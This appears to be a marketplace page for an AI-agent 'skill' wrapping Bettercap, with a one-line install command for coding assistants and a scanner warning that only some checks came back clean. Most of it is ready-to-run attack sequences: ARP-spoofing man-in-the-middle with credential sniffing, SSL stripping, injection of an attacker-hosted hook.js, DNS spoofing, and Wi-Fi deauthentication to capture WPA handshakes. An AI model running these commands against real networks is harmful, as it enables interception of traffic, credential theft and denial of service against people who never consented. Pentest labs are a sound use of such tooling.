offensive-tools/network/bettercap/SKILL.md
Auth/lab ref: Bettercap network lab tooling; Wi-Fi/BLE/HID/Ethernet modules, traffic observation, MITM simulation, auth-exposure checks.
npx skillsauth add aeondave/malskill bettercapInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Network attack Swiss Army knife: MITM, sniff, spoof.
sudo bettercap -iface eth0
sudo bettercap -iface eth0 -caplet http-ui
| Command | Purpose |
|---------|---------|
| net.probe on | Discover LAN hosts |
| net.show | List discovered hosts |
| arp.spoof on | Enable ARP spoofing MITM |
| set arp.spoof.targets <ip> | Limit MITM to target |
| net.sniff on | Capture credentials/traffic |
| https.proxy on | HTTPS with SSL strip |
| wifi.recon on | WiFi AP/client discovery |
| wifi.deauth <mac> | Deauthenticate client |
| ble.recon on | BLE device scan |
sudo bettercap -iface eth0
net.probe on
set arp.spoof.duplex true
set arp.spoof.targets 192.168.1.50
arp.spoof on
net.sniff on
set https.proxy.sslstrip true
set arp.spoof.targets 192.168.1.50
arp.spoof on
https.proxy on
net.sniff on
HSTS-protected sites resist SSL strip. Works on non-HSTS HTTPS or HTTP→HTTPS redirects.
set http.proxy.injectjs http://YOUR_IP:3000/hook.js
set arp.spoof.targets 192.168.1.50
arp.spoof on
http.proxy on
set dns.spoof.domains target.com,*.target.com
set dns.spoof.address YOUR_IP
dns.spoof on
arp.spoof on
# Discover APs and clients
sudo bettercap -iface wlan0
wifi.recon on
wifi.show
# Deauth a client
wifi.deauth <client_mac>
# Deauth all clients from an AP
wifi.deauth <bssid>
# WPA handshake capture (deauth forces reconnect)
set wifi.recon.channel 6
wifi.deauth <bssid>
# Handshakes saved to: /tmp/bettercap-wifi-handshakes.pcap
# Run built-in caplet
sudo bettercap -iface eth0 -caplet http-ui
sudo bettercap -iface eth0 -caplet https-ui
sudo bettercap -iface eth0 -caplet mitm6 # IPv6 MITM
# Custom caplet file (commands, one per line)
sudo bettercap -iface eth0 -caplet my_attack.cap
| File | When to load |
|------|--------------|
| references/modules.md | Full module list, caplet syntax, filter patterns, WiFi attack chains |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.